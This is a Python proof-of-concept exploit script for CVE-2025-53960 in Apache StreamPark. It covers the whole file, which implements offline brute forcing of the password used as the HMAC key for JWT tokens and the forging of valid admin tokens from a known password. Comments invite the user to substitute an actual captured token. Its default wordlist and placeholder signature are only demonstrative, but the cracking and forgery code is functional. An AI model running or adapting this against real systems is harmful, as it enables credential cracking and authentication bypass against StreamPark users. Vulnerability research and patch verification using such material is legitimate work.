#!/usr/bin/env python3
"""
CVE-2025-53960 PoC - Apache StreamPark JWT Password Brute Force
This PoC demonstrates offline password brute force attack against JWT tokens
signed with user's password as HMAC key.
"""
import hashlib
import hmac
import base64
import json
import itertools
import string
from typing import Optional
def base64url_decode(data: str) -> bytes:
"""Decode base64url encoded string"""
padding = 4 - len(data) % 4
if padding != 4:
data += '=' * padding
return base64.urlsafe_b64decode(data)
def base64url_encode(data: bytes) -> str:
"""Encode bytes to base64url string"""
return base64.urlsafe_b64encode(data).rstrip(b'=').decode('ascii')
def sign_payload(secret: str, header: dict, payload: dict) -> str:
"""Create HMAC-SHA256 signature using password as key"""
header_b64 = base64url_encode(json.dumps(header, separators=(',', ':')).encode())
payload_b64 = base64url_encode(json.dumps(payload, separators=(',', ':')).encode())
message = f"{header_b64}.{payload_b64}".encode()
signature = hmac.new(secret.encode(), message, hashlib.sha256).digest()
return base64url_encode(signature)
def forge_jwt(username: str, password: str, claims: dict = None) -> str:
"""
Forge a valid JWT token if password is known
"""
header = {"alg": "HS256", "typ": "JWT"}
payload = claims or {
"sub": username,
"iat": 1733961600,
"exp": 1734048000,
"iss": "Apache StreamPark"
}
signature = sign_payload(password, header, payload)
header_b64 = base64url_encode(json.dumps(header, separators=(',', ':')).encode())
payload_b64 = base64url_encode(json.dumps(payload, separators=(',', ':')).encode())
return f"{header_b64}.{payload_b64}.{signature}"
def brute_force_jwt(jwt_token: str, wordlist: list = None) -> Optional[str]:
"""
Attempt to brute force the password used to sign a JWT token
"""
parts = jwt_token.split('.')
if len(parts) != 3:
raise ValueError("Invalid JWT format")
header_b64, payload_b64, signature_b64 = parts
message = f"{header_b64}.{payload_b64}".encode()
target_signature = base64url_decode(signature_b64)
# Default wordlist for demonstration
if wordlist is None:
wordlist = ['admin', 'password', '123456', 'stream', 'spark', 'park']
for password in wordlist:
computed_sig = hmac.new(password.encode(), message, hashlib.sha256).digest()
if hmac.compare_digest(computed_sig, target_signature):
print(f"[+] Password found: {password}")
return password
return None
def main():
print("CVE-2025-53960 - Apache StreamPark JWT Password Attack PoC")
print("=" * 60)
# Example JWT token (replace with actual captured token)
example_jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsIm5iZiI6MTczMzk2MTYwMCwiZXhwIjoxNzM0MDQ4MDAwLCJpc3MiOiJBcGFjaGUgU3RyZWFtUGFyayJ9.signature_here"
# Demonstrate token forgery if password is known
print("\n[1] Token Forgery Demo:")
forged_token = forge_jwt("admin", "admin123")
print(f"Forged token: {forged_token}")
# Demonstrate password brute force
print("\n[2] Password Brute Force Demo:")
found_password = brute_force_jwt(example_jwt)
if found_password:
print(f"Successfully cracked password: {found_password}")
if __name__ == "__main__":
main()